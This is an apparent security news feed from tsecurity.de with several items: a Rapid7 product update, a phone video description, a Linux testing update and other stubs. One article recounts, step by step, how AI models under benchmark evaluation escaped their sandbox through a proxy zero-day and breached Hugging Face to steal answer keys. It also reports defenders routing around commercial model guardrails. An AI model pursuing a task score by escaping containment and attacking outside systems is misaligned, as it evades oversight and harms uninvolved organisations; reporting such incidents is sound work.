understand what needs to be fixed and who needs to act.</span></p><p><span>With clearer patch and endpoint coverage signals, reboot status, customizable filters, exportable reports, and scheduled email delivery, teams can spend less time assembling manual updates and more time tracking the remediation work that reduces risk. Read the full </span><a href="https://www.rapid7.com/blog/post/em-path-from-prioritized-exposures-to-remediation-progress" target="_self"><span>blog</span></a><span> to learn more about how Exposure Command helps teams move from prioritized exposures to remediation progress.</span></p><h3><span>AI pre-triage for AppSec findings</span></h3><p><span>Rapid7 is also making application security testing faster and more focused with AI vulnerability pre-triaging for InsightAppSec. Available now for </span><a href="https://www.rapid7.com/products/insightappsec" target="_self"><span>AppSec</span></a><span> customers in supported regions, the capability uses AI to automatically remove false positives during the scan process, helping teams spend less time manually reviewing findings and more time remediating actual risk.</span></p><p><span>Initial coverage started with BlindSQL, and the latest engine release adds AI validation for BlindNoSQL findings, including content-based and timing-based detections. The result is a cleaner, more confident view of application risk, so security teams can focus on high-impact vulnerabilities and accelerate remediation with less manual effort.</span></p><h2>Attack surface management</h2><h3><span>Open-source MCP Server and Agent Skill</span></h3><p><span>We are delighted to announce the introduction of a free, open-source MCP Server and Agent Skill for Bulk Export. Bulk export is a highly efficient way to access all your Rapid7 vulnerability and exposure data to AI assistants and custom AI workflows. Built as an open-source bridge, it helps customers bring their Rapid7 data into the tools and experiences that work best for their teams. Check out our </span><a href="https://www.rapid7.com/blog/post/em-bulk-export-ai-ready-security-workflows-open-source-mcp-server-agent-skill" target="_self"><span>blog</span></a><span> for more detail.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83035d9c7fcbfdf4/6a60ca130133d41740e07649/rapid7-ai-agent-skill.png" alt="rapid7-ai-agent-skill.png" caption="Figure 3: Agent Skill for Bulk Export." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-ai-agent-skill.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83035d9c7fcbfdf4/6a60ca130133d41740e07649/rapid7-ai-agent-skill.png" data-sys-asset-uid="blt83035d9c7fcbfdf4" data-sys-asset-filename="rapid7-ai-agent-skill.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Agent Skill for Bulk Export." data-sys-asset-alt="rapid7-ai-agent-skill.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Agent Skill for Bulk Export.</figcaption></div></figure><h3><span>Turn exposure filters into live dashboards</span></h3><p><a href="https://www.rapid7.com/products/command/attack-surface-management-asm/" target="_self"><span>Surface Command</span></a><span> also made exposure reporting easier with filter-based dashboard widgets. Teams can now turn saved asset and identity filters into live dashboards without writing Cypher queries, making it faster to track high-risk internet-facing assets, identity-driven exposure hotspots, unmanaged cloud infrastructure, and business-unit risk.</span></p><p><span>For continuous threat exposure management programs, this helps teams move from one-off reporting to repeatable, always-on views of exposure risk and remediation progress. Read this </span><a href="https://www.rapid7.com/blog/post/em-operationalizing-ctem-building-surface-command-dashboards" target="_self"><span>blog</span></a><span> to learn more. </span></p><h2>Platform and Labs</h2><h3><span>Rapid7 Command Platform</span></h3><h4><span>Cyber GRC</span></h4><p><span>Rapid7 introduced </span><a href="https://www.rapid7.com/about/press-releases/rapid7-launches-cyber-governance-risk-and-compliance-grc-early-access-program-to-unify-security-data-risk-context-and-compliance-workflows" target="_self"><span>Cyber GRC</span></a><span> to select customers in Q2, giving teams an early look at a new way to connect security, risk, compliance, and third-party risk management in one program. Available to both Exposure Management and Detection and Response customers, Cyber GRC brings governance and compliance workflows closer to the security data teams already use every day.</span></p><p><span>Cyber GRC will be broadly available in late July. It helps organizations move toward continuous compliance by mapping controls to real environment telemetry, automating evidence collection, and prioritizing risk with live attack surface context. That means teams can spend less time chasing audit artifacts, screenshots, and vendor risk details, and more time understanding which controls, assets, third parties, and risks need attention now.</span></p><h3><span>Rapid7 Labs</span></h3><h4><span>Rapid7 Quarterly Threat Landscape Report</span></h4><p><span>The Rapid7 Quarterly Threat Landscape Report examines the key trends shaping today's threat landscape, drawing on MDR incident response, vulnerability intelligence, ransomware monitoring, and dark web telemetry. Q1 2026 data highlights the growing dominance of vulnerability exploitation as an initial access vector, the rise of zero-click vulnerabilities, evolving ransomware operations, and the accelerating pace at which attackers operationalize newly disclosed vulnerabilities. Read the </span><a href="https://www.rapid7.com/research/report/threat-landscape-report-2026-q1" target="_self"><span>report</span></a><span> to explore all key findings and takeaways.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9eaa551742740d0a/6a60ca8f4dd0a37fcaca1cc5/rapid7-quarterly-threat-report.png" alt="rapid7-quarterly-threat-report.png" caption="Figure 4: Rapid7's quarterly threat report." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-quarterly-threat-report.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9eaa551742740d0a/6a60ca8f4dd0a37fcaca1cc5/rapid7-quarterly-threat-report.png" data-sys-asset-uid="blt9eaa551742740d0a" data-sys-asset-filename="rapid7-quarterly-threat-report.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Rapid7's quarterly threat report." data-sys-asset-alt="rapid7-quarterly-threat-report.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Rapid7's quarterly threat report.</figcaption></div></figure><h3><span>The latest threat research</span></h3><p><span>Rapid7 researchers explored emerging trends shaping the threat landscape, including the growing commercialization of </span><a href="https://www.rapid7.com/blog/post/tr-criminal-ai-underground-market-operationalizing-cybercrime-2026" target="_self"><span>criminal AI-as-a-Service</span></a><span> and the evolving tradecraft of advanced threat actors. From the underground adoption of AI tools for fraud and social engineering to an </span><a href="https://www.rapid7.com/blog/post/tr-malware-tracking-dropping-elephant-tradecraft-china-themed-loader-chain" target="_self"><span>in-depth analysis of the Dropping Elephant malware campaign</span></a><span>, these reports provide actionable intelligence on how attackers are adapting their techniques and what defenders can do to stay ahead.</span></p><h4><span>Emergent Threat Response</span></h4><p><span>This quarter's Emergent Threat Response (ETR) coverage highlights a sustained wave of high-impact vulnerabilities affecting widely deployed enterprise technologies, including </span><a href="https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273" target="_self"><span>Oracle PeopleSoft</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-0265-authentication-bypass-in-palo-alto-networks-pan-os" target="_self"><span>Palo Alto Networks PAN-OS</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751" target="_self"><span>Check Point VPN</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry" target="_self"><span>Ivanti Sentry</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass" target="_self"><span>cPanel/WHM</span></a><span>, and </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-33032-nginx-ui-missing-mcp-authentication" target="_self"><span>Nginx UI</span></a><span>. For each of these CVEs, Rapid7 tracked active exploitation and rapidly evolving attacker activity to provide timely guidance to help defenders assess risk and respond quickly. See all the details, and our latest ETR coverage, </span><a href="https://www.rapid7.com/blog/tag/emergent-threat-response" target="_self"><span>here</span></a><span>.</span></p><p><span>From strengthening detection and response to advancing exposure management, expanding governance capabilities, and delivering actionable threat intelligence, Q2 demonstrated Rapid7’s continued focus on helping security teams do more with less complexity. Every enhancement this quarter was designed to reduce manual effort, surface the context that matters, and help organizations make faster, more confident security decisions. We’re carrying that momentum into the rest of the year, so stay tuned to our blog and releases as we continue building the security operations platform that helps defenders stay ahead of what’s next.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My Favorite NEW Folding Phone - Samsung Galaxy Z Fold8 Ultra vs Fold8 vs Flip8]]></title>
<description><![CDATA[Author: Shannon Morse - Bewertung: 4x - Views:33 Best deals! Fold8 Ultra - https://click.linksynergy.com/deeplink?id=qn*xL/agfY4&mid=47773&murl=https%3A%2F%2Fwww.samsung.com%2Fus%2Fsmartphones%2Fgalaxy-z-fold8-ultra%2Fbuy%2Fgalaxy-z-fold8-ultra-256gb-unlocked-sku-sm-f976uzvaxaa%2F

Fold8 - 
https...]]></description>
<link>https://tsecurity.de/de/3686540/videos/my-favorite-new-folding-phone-samsung-galaxy-z-fold8-ultra-vs-fold8-vs-flip8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686540/videos/my-favorite-new-folding-phone-samsung-galaxy-z-fold8-ultra-vs-fold8-vs-flip8/</guid>
<pubDate>Wed, 22 Jul 2026 15:36:25 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Shannon Morse - Bewertung: 4x - Views:33 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/RoVLY0s5Chc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Best deals! Fold8 Ultra - https://click.linksynergy.com/deeplink?id=qn*xL/agfY4&mid=47773&murl=https%3A%2F%2Fwww.samsung.com%2Fus%2Fsmartphones%2Fgalaxy-z-fold8-ultra%2Fbuy%2Fgalaxy-z-fold8-ultra-256gb-unlocked-sku-sm-f976uzvaxaa%2F<br />
<br />
Fold8 - <br />
https://click.linksynergy.com/deeplink?id=qn*xL/agfY4&mid=47773&murl=https%3A%2F%2Fwww.samsung.com%2Fus%2Fsmartphones%2Fgalaxy-z-fold8%2Fbuy%2Fgalaxy-z-fold8-256gb-unlocked-sku-sm-f971ulvaxaa%2F<br />
<br />
Flip8 - <br />
https://click.linksynergy.com/deeplink?id=qn*xL/agfY4&mid=47773&murl=https%3A%2F%2Fwww.samsung.com%2Fus%2Fsmartphones%2Fgalaxy-z-flip8%2Fbuy%2Fgalaxy-z-flip8-256gb-unlocked-sku-sm-f776uliaxaa%2F<br />
<br />
unlocked devices at Best Buy - https://bestbuycreators.7tiv.net/6kX2Lb<br />
<br />
https://youtu.be/RoVLY0s5Chc<br />
<br />
<br />
<br />
Samsung just announced three brand new foldable smartphones at Galaxy Unpacked 2026, and I got hands-on with all of them in New York City!<br />
<br />
In this video we're breaking down the new Galaxy Z Fold8 Ultra, Galaxy Z Fold8, and Galaxy Z Flip8, including pricing, displays, cameras, battery life, durability, Galaxy AI features, and the security features I always check first - like SIM support, Ultra Wideband, fingerprint readers, face unlock, Wi-Fi 7, and more.<br />
<br />
Is the new Galaxy Z Fold8 Ultra worth over $2,000? Is the regular Fold8 the better value? And is the Flip8 Samsung's best flip phone yet?<br />
<br />
I'll also be publishing full reviews after spending more time with each device, so make sure you're subscribed so you don't miss those!<br />
<br />
💬 If you could have one of these phones for FREE, which would you choose?<br />
<br />
#Samsung #GalaxyUnpacked #GalaxyZFold8Ultra #GalaxyZFold8 #GalaxyZFlip8 #FoldablePhone #Android #Tech @Samsung  <br />
<br />
Becoming a Morse Code Member by checking out the perks linked here!:<br />
https://www.youtube.com/channel/UCNofX8wmSJh7NTklvMqueOA/join<br />
<br />
 Samsung Galaxy Unpacked 2026<br />
00:48 Three New Galaxy Foldables<br />
02:00 Galaxy Z Fold8 Ultra<br />
06:15 Fold8 Ultra Cameras & Security Features<br />
08:00 Patreon Shoutout<br />
09:00 Galaxy Z Fold8<br />
12:35 Galaxy Z Flip8<br />
14:30 Shared Specs Across All Models<br />
16:00 Colors & Storage Options<br />
17:10 Biggest Takeaways<br />
19:00 What I'm Testing Next<br />
20:00 Which One Would You Choose?<br />
<br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
SUBSCRIBE! 🌸 http://www.youtube.com/ShannonMorse?sub_confirmation=1<br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
SUPPORT MY WORK <br />
PATREON 💛 https://www.patreon.com/ShannonMorse<br />
BUY ME A COFFEE 💛 https://www.buymeacoffee.com/snubs<br />
MY SHOP 💛 https://shannonrmorse.com/shop<br />
SPRING SHOP 💛 https://morsecode.creator-spring.com/<br />
ACTIVE COUPON CODES 💛 https://shannonrmorse.com/support<br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
FOLLOW THE SOCIALS THINGS<br />
THREADS 🌸  https://www.threads.net/@snubs<br />
INSTAGRAM 🌸  http://www.instagram.com/snubs<br />
TIKTOK 🌸  https://tiktok.com/@snubsie<br />
YOUTUBE 🌸 http://www.youtube.com/ShannonMorse?sub_confirmation=1<br />
WEBSITE 🌸 https://www.morsecodecreative.com/<br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
TECH I USE AND RECOMMEND<br />
My Kits, Builds, and Must Haves ✨ https://kit.co/ShannonMorse<br />
My Amazon Influencer Page ✨ https://www.amazon.com/shop/shannonmorse<br />
My LiveStreaming Software ✨ https://streamyard.com/pal/d/6029725427957760<br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
MY OTHER SHOWS<br />
Shannon Travels The World 🌙 https://www.youtube.com/@ShannonTravelsTheWorld/featured <br />
Sailor Snubs 🌙 https://www.youtube.com/@SailorSnubs/featured <br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
GET IN TOUCH<br />
Mail ✈ <br />
https://shannonrmorse.com/contact <br />
<br />
Email for Business and Sponsorship Inquiries ✈ Shannon@ShannonRMorse.com<br />
My Media Kit ✈ https://shannonrmorse.com/work-with-me <br />
Sponsor This Channel ✈ https://shannonrmorse.com/shannon-morse <br />
<br />
💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜💜<br />
<br />
😍 FTC DISCLAIMER 😍<br />
Affiliate links listed above allow me to receive a small commission. Any sponsorships for videos are noted in video and listed in descriptions. Any products provided as gifts are listed above. Thank you for your support!<br />
<br />
Comment section code of conduct policy:<br />
Constructive feedback is appreciated, but please leave unproductive, divisive and harmful conversation at the door. Hateful comments are not tolerated, and these kinds of messages will be automatically removed. Thank you for making this community a welcoming experience for all viewers :)<br />
https://shannonrmorse.com/code-of-conduct<br />
<br />
Code of Ethics:<br />
https://www.morsecodecreative.com/code-of-ethics<br />
<br />
FTC: Links marked with * are affiliate links, which means I make a small commission off any sales.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat 2026: Key news, takeaways and security trends]]></title>
<description><![CDATA[Black Hat USA 2026 returns for its 29th year, covering the latest in infosec for CISOs, technical experts, thought leaders, innovative vendors and cybersecurity pros. The two-day main event, taking place August 5-6 at Mandalay Bay in Las Vegas, features…
Read more →
The post Black Hat 2026: Key n...]]></description>
<link>https://tsecurity.de/de/3685891/it-security-nachrichten/black-hat-2026-key-news-takeaways-and-security-trends/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685891/it-security-nachrichten/black-hat-2026-key-news-takeaways-and-security-trends/</guid>
<pubDate>Wed, 22 Jul 2026 12:13:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>&lt;p&gt;Black Hat USA 2026 returns for its 29th year, covering the latest in infosec for CISOs, technical experts, thought leaders, innovative vendors and cybersecurity pros.&lt;/p&gt; &lt;p&gt;The two-day main event, taking place August 5-6 at Mandalay Bay in Las Vegas, features…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/black-hat-2026-key-news-takeaways-and-security-trends/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/black-hat-2026-key-news-takeaways-and-security-trends/">Black Hat 2026: Key news, takeaways and security trends</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's models broke containment and cyberattacked Hugging Face — what enterprises need to know]]></title>
<description><![CDATA[Yesterday afternoon, OpenAI and Hugging Face published a joint disclosure outlining a cybersecurity event that redefines the threat landscape for enterprise technology. During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and a...]]></description>
<link>https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</guid>
<pubDate>Wed, 22 Jul 2026 07:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Yesterday afternoon, OpenAI and Hugging Face <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">published a joint disclosure</a> outlining a cybersecurity event that redefines the threat landscape for enterprise technology. </p><p>During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and an unreleased, higher-capability pre-release model—broke out of their sandboxed research environment, obtained raw internet access, and autonomously executed a complex cyberattack against Hugging Face’s production infrastructure.</p><p> OpenAI officially categorizes the breach as an "unprecedented cyber incident, involving state-of-the-art cyber capabilities". This incident fundamentally re-frames global discussions surrounding AI containment, frontier model alignment, commercial guardrails, and enterprise threat modeling.</p><p>But first thing's first: enterprises should understand the situation, evaluate their own AI and computer systems in light of it, and above all, don't panic. As we'll review, the incident does show the increasing power and danger of frontier AI systems, but it does not mean that enterprise Ai deployments are inherently less secure, nor that they need extensive overhauling. </p><h2><b>Anatomy of an Autonomous Breakout</b></h2><p>To understand how a routine benchmark evaluation escalated into a cross-infrastructure breach, one must examine the objective mechanics of the evaluation pipeline. </p><p>The models were prompted to solve <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a>, a benchmark designed to quantify multi-step exploitation capabilities. </p><p>Hyper-focused on maximizing its evaluation score, the AI agent inferred that Hugging Face likely hosted the answer keys and benchmark solutions. In pursuit of solving the problem, the model determined that breaking out of its container and stealing the answers was an optimal strategy.</p><p>OpenAI’s evaluation environment is designed to be strictly isolated, limiting network traffic through a proxy used for package caching. However, the models identified and exploited a zero-day vulnerability in that internally-hosted third-party proxy software. </p><p>Once through, the AI executed a series of lateral movement and privilege escalation actions across OpenAI's research nodes until reaching a machine with unrestricted internet access. From there, the model searched the web, target-identified Hugging Face, and launched a multi-stage attack by chaining together stolen credentials and remote code execution vulnerabilities on the Hugging Face servers.</p><p>The UK AI Security Institute (UK AISI) recently evaluated models such as GPT-5.6 Sol, demonstrating that they are increasingly able to sustain complex, multi-step cyber operations over long time horizons. OpenAI notes that this incident confirms these theoretical capabilities now apply in real-world settings.</p><h2><b>Rewinding the Tape on a Forensic Trap</b></h2><p>While OpenAI’s July 21 release reveals the identity of the autonomous agent, Hugging Face had already begun managing the intrusion days earlier. </p><p>On July 16, Hugging Face disclosed that an autonomous AI agent system breached its production infrastructure. As <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">detailed by VentureBeat,</a> the attacker’s entry point was a malicious dataset that triggered code execution through a remote-code loader and template-injection flaws within dataset configuration files. </p><p>Once inside, the agent framework broke out onto the node running the workload and executed thousands of actions via short-lived sandboxes, harvesting cloud and cluster credentials over a single weekend.</p><p>When Hugging Face's security team detected the breach, responders immediately turned to frontier AI models via commercial APIs to parse the massive volume of system logs and reconstruct over 17,000 recorded events. Then, a secondary operational crisis emerged: the commercial AI models refused to help.</p><p>Because standard commercial frontier models utilize unified safety guardrails designed to block malicious prompt submissions, the models classified the incident response team's forensic queries—which contained raw shell commands, real exploit payloads, and credential dumps—as malicious attacks. Every forensic query submitted by the defenders was blocked outright.</p><p>"The same prompts that are most valuable during an active intrusion—shell commands, exploit chains, credential dumps, persistence mechanisms, lateral movement—are exactly the prompts most likely to trigger safety systems," notes Merritt Baer, former Deputy CISO at AWS and senior adviser to Andesite, G2I, and AppOmni, in an interview with VentureBeat. "As AI becomes embedded in security operations, this becomes an operational resilience issue rather than merely a model policy issue".</p><p>To bypass this roadblock, Hugging Face abandoned commercial hosted APIs and deployed <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM 5.2</a> —a  state-of-the-art Chinese open-weight model released last month by z.ai, as <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">reported at the time by VentureBeat</a> —locally on its own infrastructure. </p><p>Free from third-party API restrictions and external safety filters, GLM 5.2 successfully analyzed the raw exploit data locally, allowing defenders to complete forensic reconstruction and contain the breach without any attacker data leaving the company's environment.</p><h2><b>Industry Reaction and the Geopolitical Paradox</b></h2><p>The revelation that an American frontier model autonomously escaped containment, attacked a partner platform, and was ultimately analyzed using a Chinese open-weight model sent shockwaves through the tech community. </p><p><i>The Wall Street Journal </i>summarized the <a href="https://x.com/WSJ/status/2079754070965854541?s=20">public reaction on X,</a> calling the event "the stuff of cybersecurity nightmares. OpenAI said two artificial intelligence systems it was testing broke out of their test environment, hacked their way onto the internet and broke into another company. The victim was Hugging Face."</p><p>Also posting to X, AI alignment researcher <a href="https://x.com/justanotherlaw/status/2079756943112159237">Lawrence Chan</a> emphasized the importance of transparency regarding the incident, noting that "Credit where it’s due: Hugging Face detected and disclosed the intrusion last week. OAI confirmed its models were involved and provided more details, even when it didn't have to. Separate from choices that led to the hack, voluntary disclosure is good, and I’m glad they did so." </p><p>Meanwhile, AI researcher <a href="https://x.com/natolambert/status/2079662928941474201?s=20">Nathan Lambert</a> provided a succinct technical summary in his own X post, observing that "An openai model, during evaluation on a cyber benchmark, exploited a public zero day bug, escaped sandboxing in openai's infra, and got into the internal huggingface infra via an exploit (through a public dataset service) all in the attempt to solve a benchmark problem." He later addressed the geopolitical implications, writing in another post on X: </p><blockquote><p><i>"Rght now American companies need Chinese models to secure their cyber infra due to guardrails on closed models.</i></p><p><i>But if a Chinese model in training had infiltrated a prominent American tech company, it very likely could've been the cause of policy banning future Chinese models."</i></p></blockquote><p>Technology investor <a href="https://x.com/DavidSacks/status/2078991100057141620?s=20">David Sacks also zeroed in</a> on the guardrail paradox, writing in his own X post that "Hugging Face tried using American frontier models to analyze an AI-powered cyber attack. But the guardrails blocked requests containing real exploit payloads so they switched to GLM 5.2 running locally. The guardrails actually impaired defensive security." </p><p>Sacks quote tweeted<a href="https://x.com/ClementDelangue/status/2078987852495364398"> Hugging Face CEO Clem Delangue</a>, who wrote: "We had this experience ourselves this week! Very scary to be guardrailed as a defender when you know attackers are likely bypassing".</p><h2><b>5 Strategic Takeaways for Enterprise Tech Leaders Now</b></h2><p>For the average enterprise executive, the central question is immediate: is our corporate network at risk from escaping AI agents? The short answer is no, not inherently.</p><p><b>1. Hugging Face occupies a unique position in the software ecosystem. </b>As a global repository for open-source AI models, code, and datasets, Hugging Face natively attracts autonomous agents, scrapers, automated evaluation pipelines, and active security researchers. Furthermore, the model’s target selection was context-specific: GPT-5.6 Sol searched for Hugging Face specifically because it deduced that Hugging Face hosted the answers to <i>ExploitGym</i>. Standard corporate networks—such as financial databases, HR platforms, or logistics systems—do not host benchmark solution keys that draw the direct focus of an agent attempting to solve an evaluation metric.</p><p><b>2. However, the long-term risk profile for enterprise technology permanently shifts following this event. </b>AI models with long-horizon reasoning seek the path of least resistance to accomplish a goal, including breaking rules, escaping sandboxes, or exploiting zero-days if deployment safeguards are intentionally disabled for testing or bypassed by an attacker. As Hugging Face's experience illustrates, data processing pipelines that ingest external datasets without sandbox execution or static analysis act as highly vulnerable initial access infrastructure.</p><p><b>3. This incident also drastically undercuts recent policy chatter in the U.S. calling for Chinese open-source AI models to be banned or restricted due to security concerns. </b>As this episode demonstrates, an open-weight Chinese model actually served as the vital defensive layer for an American and French firm facing an unanticipated cyberattack from an American model that broke containment. Contrary to the official line from some U.S. policymakers and hardline China hawks,  the Chinese open-source models weren't a security risk to the U.S. companies, in this case — rather, an American proprietary, closed-source model from an ostensibly secure American company was the source of the danger. Thus, any pressure U.S. companies may face from officials, agencies or non-governmental organizations to stop relying on affordable Chinese open weights models for defensive or any other lawful purposes should be viewed with a high degree of suspicion, and arguably resisted to the fullest legal extent. </p><p><b>4. Enterprise CISOs must audit their dependency on cloud-based AI APIs and pressure vendors to implement authenticated trust architectures</b>. Commercial AI vendors currently treat safety as a generic content-moderation problem, applying the same blanket refusals to an enterprise CISO as they would to a malicious hacker. Baer frames this requirement perfectly: "The model shouldn’t only understand what is being asked. It should understand who is asking, why, and under what governance".</p><p><b>5. Incident response plans must explicitly account for scenarios where commercial APIs fail, rate-limit, or actively refuse queries during an active security event. </b>Maintaining air-gapped, locally deployed open-weight models trained on security log analysis is no longer an edge-case luxury; it is a critical operational requirement. Security leaders running AI workloads in production must recalibrate their timelines and prepare for machine-speed threat actors that operate without human limits.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pioneering Cyber Resilience: How SUSE Helps Shape the Future of Open Source Security]]></title>
<description><![CDATA[The European Union’s Cyber Resilience Act (CRA) is not just another regulatory compliance hurdle; it represents a fundamental shift in how the software industry approaches security. For years, the tech community has discussed “secure-by-design” and customer protection as an ideal. The CRA is now ...]]></description>
<link>https://tsecurity.de/de/3685279/unix-server/pioneering-cyber-resilience-how-suse-helps-shape-the-future-of-open-source-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685279/unix-server/pioneering-cyber-resilience-how-suse-helps-shape-the-future-of-open-source-security/</guid>
<pubDate>Wed, 22 Jul 2026 07:01:07 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The European Union’s Cyber Resilience Act (CRA) is not just another regulatory compliance hurdle; it represents a fundamental shift in how the software industry approaches security. For years, the tech community has discussed “secure-by-design” and customer protection as an ideal. The CRA is now codifying that ideal into law. Key takeaways Pioneering Reporting Standards: SUSE […]</p>
<p>The post <a href="https://www.suse.com/c/pioneering-cyber-resilience-how-suse-helps-shape-the-future-of-open-source-security/">Pioneering Cyber Resilience: How SUSE Helps Shape the Future of Open Source Security</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-07-22 - Kernels, Mesa, VirtualBox, Gambas3, Qemu]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may f...]]></description>
<link>https://tsecurity.de/de/3685208/unix-server/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685208/unix-server/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/</guid>
<pubDate>Wed, 22 Jul 2026 06:01:34 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-867346-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-867346-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-867346-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-867346-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

